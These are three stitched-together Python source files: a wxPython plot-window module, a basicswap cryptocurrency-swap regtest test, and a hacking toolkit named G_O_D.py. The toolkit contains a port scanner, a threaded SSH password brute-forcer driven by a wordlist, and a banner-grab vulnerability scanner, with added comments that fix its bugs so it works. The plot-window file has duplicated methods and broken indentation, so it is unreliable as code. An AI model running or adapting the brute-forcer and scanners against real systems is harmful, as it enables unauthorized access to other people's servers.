        self.preview_cmaps_mnui = wx.MenuItem(self.colormaps_mnu, wx.ID_ANY, text='Preview Colormaps',
                                              help='Preview available colormaps')
        self.Bind(wx.EVT_MENU, self.controller.on_preview_cmaps, id=self.preview_cmaps_mnui.GetId())
        self.colormaps_mnu.AppendItem(self.preview_cmaps_mnui)
        self.select_cmap_mnui = wx.MenuItem(self.colormaps_mnu, wx.ID_ANY, text='Select Colormap...',
                                            help='Selects colormap')
        self.Bind(wx.EVT_MENU, self.controller.on_select_cmap, id=self.select_cmap_mnui.GetId())
        self.colormaps_mnu.AppendItem(self.select_cmap_mnui)
        self.create_cmap_mnui = wx.MenuItem(self.colormaps_mnu, wx.ID_ANY, text='Create Colormap...',
                                            help='Create or edit a colormap')
        self.colormaps_mnu.AppendItem(self.create_cmap_mnui)
        self.Bind(wx.EVT_MENU, self.controller.on_create_cmap, id=self.create_cmap_mnui.GetId())
        self.plot_mnu.AppendMenu(wx.ID_ANY, "Colormaps", self.colormaps_mnu)
        gridtoggle_mnui = wx.MenuItem(self.plot_mnu, wx.ID_ANY, text="Toggle Grid",
                                      help="Turns grid on or off")
        self.plot_mnu.AppendItem(gridtoggle_mnui)
        self.Bind(wx.EVT_MENU, self.controller.on_toggle_grid, id=gridtoggle_mnui.GetId())
        self.menubar.Append(self.plot_mnu, "&Plot")
    def init_specific_ops_menu(self):
        """Implements imgplot-specific operations for the Operations menu"""
        self.manip_mnu = wx.Menu() # Data manipulations
        self.flip_mnu = wx.Menu() # Flip data
        self.flipud_mnui = wx.MenuItem(self.flip_mnu, wx.ID_ANY, text="Vertically")
        self.Bind(wx.EVT_MENU, self.controller.on_flipud, id=self.flipud_mnui.GetId())
        self.flip_mnu.AppendItem(self.flipud_mnui)
        self.fliplr_mnui = wx.MenuItem(self.flip_mnu, wx.ID_ANY, text="Horizontally")
        self.Bind(wx.EVT_MENU, self.controller.on_fliplr, id=self.fliplr_mnui.GetId())
        self.flip_mnu.AppendItem(self.fliplr_mnui)
        self.manip_mnu.AppendMenu(wx.ID_ANY, 'Flip', self.flip_mnu)
        self.rot_mnu = wx.Menu() # Rotate data
        self.rot90ccw_mnui = wx.MenuItem(self.rot_mnu, wx.ID_ANY, text="90 Degrees CCW")
        self.Bind(wx.EVT_MENU, self.controller.on_rot90ccw, id=self.rot90ccw_mnui.GetId())
        self.rot_mnu.AppendItem(self.rot90ccw_mnui)
        self.rot90cw_mnui = wx.MenuItem(self.rot_mnu, wx.ID_ANY, text="90 Degreees CW")
        self.Bind(wx.EVT_MENU, self.controller.on_rot90cw, id=self.rot90cw_mnui.GetId())
        self.rot_mnu.AppendItem(self.rot90cw_mnui)
        self.rot180_mnui = wx.MenuItem(self.rot_mnu, wx.ID_ANY, text="180 Degrees")
        self.Bind(wx.EVT_MENU, self.controller.on_rot180, id=self.rot180_mnui.GetId())
        self.rot_mnu.AppendItem(self.rot180_mnui)
        self.manip_mnu.AppendMenu(wx.ID_ANY, 'Rotate', self.rot_mnu)
        self.ops_mnu.AppendMenu(wx.ID_ANY, 'Flip/Rotate Data', self.manip_mnu)
        self.detrend_mnu = wx.Menu() # Detrending menu
        self.detrend_constantx_mnui = wx.MenuItem(self.detrend_mnu, wx.ID_ANY,
                                                  text="Constant Horizontal")
        self.Bind(wx.EVT_MENU, self.controller.on_detrend_meanx,
                  id=self.detrend_constantx_mnui.GetId())
        self.detrend_mnu.AppendItem(self.detrend_constantx_mnui)
        self.detrend_constanty_mnui = wx.MenuItem(self.detrend_mnu, wx.ID_ANY,
                                                  text="Constant Vertical")
        self.Bind(wx.EVT_MENU, self.controller.on_detrend_meany,
                  id=self.detrend_constanty_mnui.GetId())
        self.detrend_mnu.AppendItem(self.detrend_constanty_mnui)
        self.detrend_linearx_mnui = wx.MenuItem(self.detrend_mnu, wx.ID_ANY,
                                                text="Linear Horizontal")
        self.Bind(wx.EVT_MENU, self.controller.on_detrend_linearx,
                  id=self.detrend_linearx_mnui.GetId())
        self.detrend_mnu.AppendItem(self.detrend_linearx_mnui)
        self.detrend_lineary_mnui = wx.MenuItem(self.detrend_mnu, wx.ID_ANY,
                                                text="Linear Vertical")
        self.Bind(wx.EVT_MENU, self.controller.on_detrend_lineary,
                  id=self.detrend_lineary_mnui.GetId())
        self.detrend_mnu.AppendItem(self.detrend_lineary_mnui)
        self.ops_mnu.AppendMenu(wx.ID_ANY, 'Detrend Data', self.detrend_mnu)
        self.transpose_mnui = wx.MenuItem(self.ops_mnu, wx.ID_ANY, text="Transpose Data")
        self.Bind(wx.EVT_MENU, self.controller.on_transpose, id=self.transpose_mnui.GetId())
        self.ops_mnu.AppendItem(self.transpose_mnui)
class MegaPlotWindow(PlotWindow):
"""Specialized four-panel PlotWindow for displaying
A, B, and C scans of a three-dimensional dataset"""
    def __init__(self, parent, data_file):
        # wx.Frame.__init__ is deferred to load_data() (inherited from
        # PlotWindow), which runs once the controller has loaded the data.
        self.parent = parent
        self.data_file = data_file
        self.controller = MegaPlotWindowController(self, data_file)
        module_logger.info("Successfully initialized MegaPlotWindow.")
        self.load_data()
@property
def axes(self):
"""Returns a tuple of all the view's axes"""
return (self.ascan_axes, self.hbscan_axes,
self.vbscan_axes, self.cscan_axes)
    def init_ui(self):
        """Creates the PlotWindow UI"""
        # Position the window just to the right of the parent frame.
        parent_x, parent_y = self.parent.GetPositionTuple()
        parent_w, parent_h = self.parent.GetSize()
        self.SetPosition((parent_x + parent_w + ui_defaults.widget_margin,
                          ui_defaults.widget_margin))
        self.main_panel = wx.Panel(self)
        self.main_panel_sizer = wx.BoxSizer(wx.VERTICAL)
        self.sizer = wx.BoxSizer(wx.VERTICAL)
        # Controls for specifying (x,y,z) position in 3D dataset
        self.ctrl_panel = wx.Panel(self.main_panel)
        self.ctrl_sizer = wx.BoxSizer(wx.HORIZONTAL)
        info_lbl = wx.StaticText(self.ctrl_panel, wx.ID_ANY, u"Coordinates In Data:", wx.DefaultPosition,
                                 wx.DefaultSize)
        self.ctrl_sizer.Add(info_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags, ui_defaults.widget_margin)
        xpos_lbl = wx.StaticText(self.ctrl_panel, wx.ID_ANY, u"X Position", wx.DefaultPosition, wx.DefaultSize)
        self.ctrl_sizer.Add(xpos_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags, ui_defaults.widget_margin)
        # Spin controls are bounded by the data's shape: x -> columns,
        # y -> rows, slice -> z planes.
        self.xpos_sc = wx.SpinCtrl(self.ctrl_panel, wx.ID_ANY, value="", min=0, max=self.controller.data.shape[1] - 1)
        self.Bind(wx.EVT_SPINCTRL, self.controller.on_xy_change, self.xpos_sc)
        self.ctrl_sizer.Add(self.xpos_sc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags, ui_defaults.widget_margin)
        ypos_lbl = wx.StaticText(self.ctrl_panel, wx.ID_ANY, u"Y Position", wx.DefaultPosition, wx.DefaultSize)
        self.ctrl_sizer.Add(ypos_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags, ui_defaults.widget_margin)
        self.ypos_sc = wx.SpinCtrl(self.ctrl_panel, wx.ID_ANY, value="", min=0, max=self.controller.data.shape[0] - 1)
        self.Bind(wx.EVT_SPINCTRL, self.controller.on_xy_change, self.ypos_sc)
        self.ctrl_sizer.Add(self.ypos_sc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags, ui_defaults.widget_margin)
        self.slice_cb = wx.CheckBox(self.ctrl_panel, wx.ID_ANY, "Plot Z Index As C Scan", style=wx.ALIGN_RIGHT)
        self.slice_cb.SetToolTipString(u"Use the specified index in Z as the C Scan plot data")
        self.slice_cb.SetValue(True)
        self.ctrl_sizer.Add(self.slice_cb, ui_defaults.lbl_pct, ui_defaults.sizer_flags, ui_defaults.widget_margin)
        self.slice_sc = wx.SpinCtrl(self.ctrl_panel, wx.ID_ANY, value="", min=0, max=self.controller.data.shape[2] - 1)
        self.Bind(wx.EVT_SPINCTRL, self.controller.on_sliceidx_change, self.slice_sc)
        slice_lbl = wx.StaticText(self.ctrl_panel, wx.ID_ANY, u"Slice Index", wx.DefaultPosition, wx.DefaultSize)
        self.ctrl_sizer.Add(slice_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags, ui_defaults.widget_margin)
        self.ctrl_sizer.Add(self.slice_sc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags, ui_defaults.widget_margin)
        self.ctrl_panel.SetSizerAndFit(self.ctrl_sizer)
        self.main_panel_sizer.Add(self.ctrl_panel, ui_defaults.lbl_pct, ui_defaults.sizer_flags,
                                  ui_defaults.widget_margin)
        # Four-panel figure: A scan, vertical/horizontal B scans, C scan.
        self.figure = Figure()
        self.canvas = FigureCanvas(self.main_panel, wx.ID_ANY, self.figure)
        self.ascan_axes = self.figure.add_subplot(221)
        self.vbscan_axes = self.figure.add_subplot(222)
        self.hbscan_axes = self.figure.add_subplot(223)
        self.cscan_axes = self.figure.add_subplot(224)
        self.cscan_cursor = Cursor(self.cscan_axes, useblit=True, color="#4F6581", alpha=0.5)
        self.figure.canvas.mpl_connect("button_press_event", self.controller.on_click)
        self.main_panel_sizer.Add(self.canvas, 1, ui_defaults.sizer_flags, 0)
        self.navtools_cb = wx.CheckBox(self.main_panel, wx.ID_ANY, "Use Plot Navigation Tools")
        self.navtools_cb.SetValue(self.controller.get_navtools_config())
        self.navtools_cb.SetToolTipString("Check to use pan/zoom tools")
        self.Bind(wx.EVT_CHECKBOX, self.controller.on_check_navtools, self.navtools_cb)
        self.main_panel_sizer.Add(self.navtools_cb, ui_defaults.lbl_pct, ui_defaults.sizer_flags,
                                  ui_defaults.widget_margin)
        self.add_toolbar()
        self.SetIcon(self.parent.GetIcon())
        self.main_panel.SetSizerAndFit(self.main_panel_sizer)
        self.sizer.Add(self.main_panel, 1, ui_defaults.sizer_flags, 0)
        self.SetSizerAndFit(self.sizer)
def add_toolbar(self):
"""Creates the matplotlib toolbar (zoom, pan/scroll, etc.)
for the plot"""
self.toolbar = NavigationToolbar2Wx(self.canvas)
self.toolbar.Realize()
if wx.Platform == '__WXMAC__':
self.SetToolBar(self.toolbar)
else:
tw, th = self.toolbar.GetSizeTuple()
fw, fh = self.canvas.GetSizeTuple()
self.toolbar.SetSize(wx.Size(fw, th))
self.main_panel_sizer.Add(self.toolbar, 0, wx.LEFT | wx.EXPAND, 0)
self.toolbar.update()
self.toggle_toolbar()
def toggle_toolbar(self):
"""Enables / disables the navigation toolbar and sets
cursors accordingly."""
if self.navtools_enabled():
self.canvas.SetCursor(wx.StockCursor(wx.CURSOR_ARROW))
else:
self.canvas.SetCursor(wx.StockCursor(wx.CURSOR_CROSS))
self.toolbar.Enable(self.navtools_enabled())
self.controller.set_navtools_config(self.navtools_enabled())
    def init_plot_menu(self):
        """Creates the Plot menu: Titles/Labels and Colormaps submenus plus the
        colorbar, B-scan style, and grid toggles; appends it to the menubar."""
        self.plot_mnu = wx.Menu()
        # --- Titles and Labels submenu ---
        self.labels_mnu = wx.Menu() # Titles and Labels
        plottitle_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set Plot Title",
                                     help="Set Plot Title")
        self.Bind(wx.EVT_MENU, self.controller.on_set_plottitle, id=plottitle_mnui.GetId())
        self.labels_mnu.AppendItem(plottitle_mnui)
        xlbl_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set X Axis Label",
                                help="Set X Axis Label")
        self.Bind(wx.EVT_MENU, self.controller.on_set_xlabel, id=xlbl_mnui.GetId())
        self.labels_mnu.AppendItem(xlbl_mnui)
        ylbl_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set Y Axis Label",
                                help="Set Y Axis Label")
        self.Bind(wx.EVT_MENU, self.controller.on_set_ylabel, id=ylbl_mnui.GetId())
        self.labels_mnu.AppendItem(ylbl_mnui)
        cbarlbl_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text='Set Colorbar Label',
                                   help='Set Colorbar Label')
        self.Bind(wx.EVT_MENU, self.controller.on_set_cbarlbl, id=cbarlbl_mnui.GetId())
        self.labels_mnu.AppendItem(cbarlbl_mnui)
        self.plot_mnu.AppendMenu(wx.ID_ANY, "Title And Labels", self.labels_mnu)
        # --- Colormaps submenu ---
        self.colormaps_mnu = wx.Menu() # Colormaps
        self.preview_cmaps_mnui = wx.MenuItem(self.colormaps_mnu, wx.ID_ANY, text='Preview Colormaps',
                                              help='Preview available colormaps')
        self.Bind(wx.EVT_MENU, self.controller.on_preview_cmaps, id=self.preview_cmaps_mnui.GetId())
        self.colormaps_mnu.AppendItem(self.preview_cmaps_mnui)
        self.select_cmap_mnui = wx.MenuItem(self.colormaps_mnu, wx.ID_ANY, text='Select Colormap...',
                                            help='Selects colormap')
        self.Bind(wx.EVT_MENU, self.controller.on_select_cmap, id=self.select_cmap_mnui.GetId())
        self.colormaps_mnu.AppendItem(self.select_cmap_mnui)
        self.create_cmap_mnui = wx.MenuItem(self.colormaps_mnu, wx.ID_ANY, text='Create Colormap...',
                                            help='Create or edit a colormap')
        self.colormaps_mnu.AppendItem(self.create_cmap_mnui)
        self.Bind(wx.EVT_MENU, self.controller.on_create_cmap, id=self.create_cmap_mnui.GetId())
        self.plot_mnu.AppendMenu(wx.ID_ANY, "Colormaps", self.colormaps_mnu)
        # --- Check items / toggles on the Plot menu itself ---
        self.show_colorbar_mnui = wx.MenuItem(self.plot_mnu, wx.ID_ANY, text="Show Colorbar",
                                              help="Show color scale in image plot", kind=wx.ITEM_CHECK)
        self.Bind(wx.EVT_MENU, self.controller.on_toggle_colorbar, id=self.show_colorbar_mnui.GetId())
        self.plot_mnu.AppendItem(self.show_colorbar_mnui)
        # Initial checked states come from the controller's stored config.
        self.show_colorbar_mnui.Check(self.controller.get_colorbar_config())
        self.plot_conventional_bscans_mnui = wx.MenuItem(self.plot_mnu, wx.ID_ANY, text="Plot Conventional B-scans",
                                                         help="Plot conventional 2D B-scans", kind=wx.ITEM_CHECK)
        self.Bind(wx.EVT_MENU, self.controller.on_change_bscans, id=self.plot_conventional_bscans_mnui.GetId())
        self.plot_mnu.AppendItem(self.plot_conventional_bscans_mnui)
        self.plot_conventional_bscans_mnui.Check(self.controller.conventional_bscans)
        gridtoggle_mnui = wx.MenuItem(self.plot_mnu, wx.ID_ANY, text="Toggle Grid",
                                      help="Turns grid on or off")
        self.plot_mnu.AppendItem(gridtoggle_mnui)
        self.Bind(wx.EVT_MENU, self.controller.on_toggle_grid, id=gridtoggle_mnui.GetId())
        self.menubar.Append(self.plot_mnu, "&Plot")
def init_specific_ops_menu(self):
"""Creates any plot-specific Operations menu items"""
self.setcscan_mnui = wx.MenuItem(self.ops_mnu, wx.ID_ANY, text="Define C Scan",
help="Specify function to generate C Scan")
self.Bind(wx.EVT_MENU, self.controller.on_define_cscan, id=self.setcscan_mnui.GetId())
self.ops_mnu.AppendItem(self.setcscan_mnui)
self.rect_mnu = wx.Menu() # Rectification operations
self.fullrect_mnui = wx.MenuItem(self.rect_mnu, wx.ID_ANY, text="Full",
help="Full Rectification")
self.Bind(wx.EVT_MENU, self.controller.on_rectify, id=self.fullrect_mnui.GetId())
self.rect_mnu.AppendItem(self.fullrect_mnui)
self.ops_mnu.AppendMenu(wx.ID_ANY, 'Rectify', self.rect_mnu)
self.gate_mnu = wx.Menu() # Gates operations
for gate in self.controller.gates:
gate_name = self.controller.gates[gate][0]
gate_desc = "Applies a {0} gate function to the data".format(gate_name)
gate_mnui = wx.MenuItem(self.gate_mnu, id=gate, text=gate_name, help=gate_desc)
self.gate_mnu.AppendItem(gate_mnui)
self.Bind(wx.EVT_MENU, self.controller.on_apply_gate, id=gate_mnui.GetId())
self.ops_mnu.AppendMenu(wx.ID_ANY, 'Gates', self.gate_mnu)
    def navtools_enabled(self):
        """Returns True if the plot navigation bar checkbox is ticked."""
        return self.navtools_cb.IsChecked()
    @property
    def plot_conventional_bscans(self):
        """True if the B-scan plots should be conventional 2D image plots
        rather than the original Megaplot 1D traces (menu check state)."""
        return self.plot_conventional_bscans_mnui.IsChecked()
    @plot_conventional_bscans.setter
    def plot_conventional_bscans(self, on=True):
        """Sets (checks/unchecks) the conventional-B-scan menu item."""
        self.plot_conventional_bscans_mnui.Check(on)
    @property
    def plot_linear_bscans(self):
        """True if the B-scan plots should be the original 1D Megaplot plots
        (i.e. conventional 2D B-scans are not selected)."""
        return not self.plot_conventional_bscans
|
test_reload.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2019-2021 tecnovert
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
"""
export TEST_RELOAD_PATH=/tmp/test_basicswap
mkdir -p ${TEST_RELOAD_PATH}/bin/{particl,bitcoin}
cp ~/tmp/particl-0.21.2.3-x86_64-linux-gnu.tar.gz ${TEST_RELOAD_PATH}/bin/particl
cp ~/tmp/bitcoin-0.21.1-x86_64-linux-gnu.tar.gz ${TEST_RELOAD_PATH}/bin/bitcoin
export PYTHONPATH=$(pwd)
python tests/basicswap/test_reload.py
"""
import os
import sys
import json
import shutil
import logging
import unittest
import traceback
import threading
import multiprocessing
from urllib import parse
from urllib.request import urlopen
from unittest.mock import patch
from basicswap.rpc import (
callrpc_cli,
)
from tests.basicswap.mnemonics import mnemonics
from tests.basicswap.common import (
waitForServer,
waitForNumOffers,
waitForNumBids,
waitForNumSwapping,
)
import basicswap.config as cfg
import bin.basicswap_prepare as prepareSystem
import bin.basicswap_run as runSystem
# Root directory holding the per-client datadirs and coin binaries
# (override with the TEST_RELOAD_PATH environment variable).
test_path = os.path.expanduser(os.getenv('TEST_RELOAD_PATH', '~/test_basicswap1'))
# Base p2p ports; client i listens on BASE + i.
PARTICL_PORT_BASE = int(os.getenv('PARTICL_PORT_BASE', '11938'))
BITCOIN_PORT_BASE = int(os.getenv('BITCOIN_PORT_BASE', '10938'))
# Set to stop background threads and abort timed waits.
delay_event = threading.Event()
logger = logging.getLogger()
logger.level = logging.DEBUG
# Only attach a stdout handler if the root logger has none yet.
if not len(logger.handlers):
    logger.addHandler(logging.StreamHandler(sys.stdout))
def btcRpc(client_no, cmd):
    """Run a bitcoin-cli RPC command against test client *client_no*'s regtest node."""
    bin_dir = os.path.join(test_path, 'bin', 'bitcoin')
    data_dir = os.path.join(test_path, 'client{}'.format(client_no), 'bitcoin')
    return callrpc_cli(bin_dir, data_dir, 'regtest', cmd, 'bitcoin-cli')
def updateThread():
    """Background miner: generate one BTC block roughly every 5 seconds
    until delay_event is set."""
    mining_addr = btcRpc(0, 'getnewaddress mining_addr bech32')
    while not delay_event.is_set():
        btcRpc(0, 'generatetoaddress {} {}'.format(1, mining_addr))
        delay_event.wait(5)
class Test(unittest.TestCase):
    """End-to-end reload test: prepares three basicswap clients on regtest,
    runs each in its own process, creates an offer and a bid, restarts one
    client mid-swap, and verifies the swap still completes."""
    @classmethod
    def setUpClass(cls):
        """Wipe and re-create the datadir/config for each of the three clients."""
        super(Test, cls).setUpClass()
        for i in range(3):
            client_path = os.path.join(test_path, 'client{}'.format(i))
            config_path = os.path.join(client_path, cfg.CONFIG_FILENAME)
            try:
                shutil.rmtree(client_path)
            except Exception as ex:
                logger.warning('setUpClass %s', str(ex))
            # Drive basicswap-prepare as if invoked from the command line.
            testargs = [
                'basicswap-prepare',
                '-datadir="{}"'.format(client_path),
                '-bindir="{}"'.format(os.path.join(test_path, 'bin')),
                '-portoffset={}'.format(i),
                '-particl_mnemonic="{}"'.format(mnemonics[i]),
                '-regtest', '-withoutcoin=litecoin', '-withcoin=bitcoin']
            with patch.object(sys, 'argv', testargs):
                prepareSystem.main()
            # Rewrite particl.conf: strip staking options and pin networking so
            # the three local nodes connect only to each other.
            with open(os.path.join(client_path, 'particl', 'particl.conf'), 'r') as fp:
                lines = fp.readlines()
            with open(os.path.join(client_path, 'particl', 'particl.conf'), 'w') as fp:
                for line in lines:
                    if not line.startswith('staking'):
                        fp.write(line)
                fp.write('port={}\n'.format(PARTICL_PORT_BASE + i))
                fp.write('bind=127.0.0.1\n')
                fp.write('dnsseed=0\n')
                fp.write('discover=0\n')
                fp.write('listenonion=0\n')
                fp.write('upnp=0\n')
                fp.write('minstakeinterval=5\n')
                fp.write('smsgsregtestadjust=0\n')
                for ip in range(3):
                    if ip != i:
                        fp.write('connect=127.0.0.1:{}\n'.format(PARTICL_PORT_BASE + ip))
            # Pruned nodes don't provide blocks
            # Rewrite bitcoin.conf similarly, also dropping any prune option.
            with open(os.path.join(client_path, 'bitcoin', 'bitcoin.conf'), 'r') as fp:
                lines = fp.readlines()
            with open(os.path.join(client_path, 'bitcoin', 'bitcoin.conf'), 'w') as fp:
                for line in lines:
                    if not line.startswith('prune'):
                        fp.write(line)
                fp.write('port={}\n'.format(BITCOIN_PORT_BASE + i))
                fp.write('bind=127.0.0.1\n')
                fp.write('dnsseed=0\n')
                fp.write('discover=0\n')
                fp.write('listenonion=0\n')
                fp.write('upnp=0\n')
                for ip in range(3):
                    if ip != i:
                        fp.write('connect=127.0.0.1:{}\n'.format(BITCOIN_PORT_BASE + ip))
            assert(os.path.exists(config_path))
    def run_thread(self, client_id):
        """Process target: run basicswap for one client (blocks until killed)."""
        client_path = os.path.join(test_path, 'client{}'.format(client_id))
        testargs = ['basicswap-run', '-datadir=' + client_path, '-regtest']
        with patch.object(sys, 'argv', testargs):
            runSystem.main()
    def test_reload(self):
        # NOTE(review): `stop_test` is never defined or assigned anywhere in
        # this module; this global declaration appears to be dead code.
        global stop_test
        processes = []
        # Launch the three clients as separate processes.
        for i in range(3):
            processes.append(multiprocessing.Process(target=self.run_thread, args=(i,)))
            processes[-1].start()
        try:
            waitForServer(delay_event, 12700)
            num_blocks = 500
            btc_addr = btcRpc(1, 'getnewaddress mining_addr bech32')
            logging.info('Mining %d Bitcoin blocks to %s', num_blocks, btc_addr)
            btcRpc(1, 'generatetoaddress {} {}'.format(num_blocks, btc_addr))
            # Wait for client 0 to sync the mined blocks.
            for i in range(20):
                if delay_event.is_set():
                    raise ValueError('Test stopped.')
                blocks = btcRpc(0, 'getblockchaininfo')['blocks']
                if blocks >= num_blocks:
                    break
                delay_event.wait(2)
            assert(blocks >= num_blocks)
            # Client 0 posts a BTC/part offer via the JSON API.
            data = parse.urlencode({
                'addr_from': '-1',
                'coin_from': '1',
                'coin_to': '2',
                'amt_from': '1',
                'amt_to': '1',
                'lockhrs': '24'}).encode()
            offer_id = json.loads(urlopen('http://127.0.0.1:12700/json/offers/new', data=data).read())
            summary = json.loads(urlopen('http://127.0.0.1:12700/json').read())
            assert(summary['num_sent_offers'] == 1)
        except Exception:
            # NOTE(review): failures above are only printed; the test
            # proceeds to the bid/swap phase regardless.
            traceback.print_exc()
        logger.info('Waiting for offer:')
        waitForNumOffers(delay_event, 12701, 1)
        # Client 1 bids on the offer.
        offers = json.loads(urlopen('http://127.0.0.1:12701/json/offers').read())
        offer = offers[0]
        data = parse.urlencode({
            'offer_id': offer['offer_id'],
            'amount_from': offer['amount_from']}).encode()
        bid_id = json.loads(urlopen('http://127.0.0.1:12701/json/bids/new', data=data).read())
        waitForNumBids(delay_event, 12700, 1)
        # Client 0 accepts the bid.
        bids = json.loads(urlopen('http://127.0.0.1:12700/json/bids').read())
        bid = bids[0]
        data = parse.urlencode({
            'accept': True
        }).encode()
        rv = json.loads(urlopen('http://127.0.0.1:12700/json/bids/{}'.format(bid['bid_id']), data=data).read())
        assert(rv['bid_state'] == 'Accepted')
        waitForNumSwapping(delay_event, 12701, 1)
        # Kill and restart client 1 mid-swap to exercise state reload.
        logger.info('Restarting client:')
        c1 = processes[1]
        c1.terminate()
        c1.join()
        processes[1] = multiprocessing.Process(target=self.run_thread, args=(1,))
        processes[1].start()
        waitForServer(delay_event, 12701)
        rv = json.loads(urlopen('http://127.0.0.1:12701/json').read())
        assert(rv['num_swapping'] == 1)
        # Keep mining in the background so the swap can confirm.
        update_thread = threading.Thread(target=updateThread)
        update_thread.start()
        logger.info('Completing swap:')
        # Poll for up to ~20 minutes (240 * 5s) for completion.
        for i in range(240):
            delay_event.wait(5)
            rv = json.loads(urlopen('http://127.0.0.1:12700/json/bids/{}'.format(bid['bid_id'])).read())
            print(rv)
            if rv['bid_state'] == 'Completed':
                break
        assert(rv['bid_state'] == 'Completed')
        # Shut everything down.
        delay_event.set()
        update_thread.join()
        for p in processes:
            p.terminate()
        for p in processes:
            p.join()
# Allow running this test module directly ("python tests/basicswap/test_reload.py").
if __name__ == '__main__':
    unittest.main()
|
G_O_D.py | from __future__ import print_function
from sys import argv,exit
import sys
import subprocess as sp
from datetime import datetime
import socket
from threading import *
import zipfile
import argparse
import optparse
import os
# Clear the terminal before printing the banner.
# NOTE(review): sys.platform is 'win32' even on 64-bit Windows, so the
# 'win62' comparison (presumably a typo for 'win64') never matches.
d=sys.platform
if(d=="win32" or d=="win62"):
    sp.call('cls',shell=True)
else:
    sp.call('clear',shell=True)
print("""
_________________________ ____________________ ___________
| | | | | \
| _________________| | __________. | | \
| | | | | | | _______. |
| | ______________ | | | | | | | |
| | | | | | | | | | | |
| | |________ | | | | | | | | |
| | | | | | | | | | | |
| -------------- | | ----------- | | |______| |
| | | | | / /
|_______________________| |__________________| |_______/__/
By : G.O.D
Blog : https://god-2.blogspot.com
Version : 1.0.3 FREE
""")
def PortScanner():
    """Interactive TCP port scanner: resolves a host entered by the user and
    probes ports 1-79, reporting the open ones and the total scan time."""
    host = input("[1/1] Host/Ip : ")
    remot = socket.gethostbyname(host)
    print("\n[+] STARTING G.O.D 1.0.3 FREE")
    c = datetime.now()
    try:
        for port in range(1, 80):
            e = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Without a timeout the socket.timeout handler below could never
            # fire and closed/filtered ports could hang the scan.
            e.settimeout(2)
            # BUG FIX: the original passed the hostname string instead of the
            # port number (connect_ex((remot, host))), raising TypeError.
            f = e.connect_ex((remot, port))
            if f == 0:
                print("[*] {} : TERBUKA".format(port))
            e.close()
    except KeyboardInterrupt:
        sys.exit()
    except socket.gaierror:
        print("[!] Hostname Nya Salah Woy!\n")
    except socket.error:
        print("[!] Hostname Tidak Di temukan!\n")
    except socket.timeout:
        print("[!] gw bosen bro! kayanya nanti aja deh pas internet lagi kenceng")
    g = datetime.now()
    tot = g - c
    print("[+] SCANNING Berhasil Dalam : ", tot)
    print()
def ssh_dicker():
    """SSH dictionary attack via pxssh; target host, user and wordlist come
    from command-line options. Prints the password when a login succeeds."""
    try:
        import pxssh
        max_con = 5
        # BUG FIX: was bound as `con_loc` but used as `con_lock` below,
        # which raised NameError at runtime.
        con_lock = BoundedSemaphore(value=max_con)
        found = False
        fails = 0
        def connect(host, user, pw, release):
            # Try one password; retries once on pty noise from pxssh.
            # BUG FIX: `global` could never see ssh_dicker's locals --
            # nonlocal is required for found/fails to be shared.
            nonlocal found, fails
            try:
                s = pxssh.pxssh()
                s.login(host, user, pw)
                print("[*] Password Di temukan : " + pw)
                found = True
            except Exception as e:
                if 'read_nonblocking' in str(e):
                    fails += 1
                    connect(host, user, pw, False)
                elif 'synchronize with original prompt' in str(e):
                    connect(host, user, pw, False)
            finally:
                # BUG FIX: original read `if releas: con_lock.releas()` --
                # both the parameter name and the method were misspelled.
                if release:
                    con_lock.release()
        def main():
            parser = optparse.OptionParser('usage%prog -H <target host> -u <user> -F <password-list>')
            parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
            parser.add_option('-F', dest='passwdFile', type='string', help='specify password file')
            parser.add_option('-u', dest='user', type='string', help='specify the user')
            (options, args) = parser.parse_args()
            host = options.tgtHost
            passFile = options.passwdFile
            user = options.user
            if host is None or passFile is None or user is None:
                print(parser.usage)
                exit(0)
            fn = open(passFile, 'r')
            for line in fn.readlines():
                if found:
                    print("[*] password DI Temukan!!!\n")
                    exit(0)
                if fails > 5:
                    print("[!] Gw Bosen coy! lama banget Timeout nya. nanti aja deh kalo sinya nya lagi oke\n")
                    exit(0)
                con_lock.acquire()
                password = line.strip("\r").strip("\n")
                print("[+] Testing : " + str(password))
                t = Thread(target=connect, args=(host, user, password, True))
                t.start()
        if __name__ == '__main__':
            main()
    except ImportError:
        print("\n[!] PXSSH : Tidak Di temukan!!!\n")
def ServerVulnScanner():
    """Banner-grab a small range of hosts derived from a user-entered prefix
    and flag any banner listed in the vulnerability file given on argv."""
    def retBanner(ip, port):
        # Return the service banner as text, or None on any failure.
        try:
            # BUG FIX: the original called socket.getdefaulttimeout(2) --
            # that function takes no argument, so every call raised and this
            # function always returned None.
            socket.setdefaulttimeout(2)
            s = socket.socket()
            s.connect((ip, port))
            # Decode: on Python 3 recv() returns bytes, which broke both the
            # `in banner` membership test and the string concatenation below.
            banner = s.recv(1024).decode(errors='ignore')
            s.close()  # avoid leaking one socket per probe
            return banner
        except Exception:
            return None
    def checkVulns(banner, filename):
        # Report the banner if any line of the vuln file appears in it.
        f = open(filename, 'r')
        for line in f.readlines():
            if line.strip('\n') in banner:
                print("[*] Server Terbukti Lemah !!! : " + banner.strip('\n'))
    def main():
        if len(sys.argv) == 2:
            filename = sys.argv[1]
            if not os.path.isfile(filename):
                print("[!] " + filename + " tidak benar atau tidak di temukan!\n")
                exit(0)
            if not os.access(filename, os.R_OK):
                print("[!] " + filename + " access denied.")
                exit(0)
        else:
            print("[!] Usage : " + str(sys.argv[0]) + " <vuln filename>")
            exit(0)
        portList = [21, 22, 25, 80, 110, 443]
        ips = input("Host : ")
        # Probe host suffixes 147-149 on the entered prefix.
        for x in range(147, 150):
            ip = ips + str(x)
            for port in portList:
                banner = retBanner(ip, port)
                if banner:
                    print("[+] " + ip + ": " + banner)
                    checkVulns(banner, filename)
    if __name__ == '__main__':
        main()
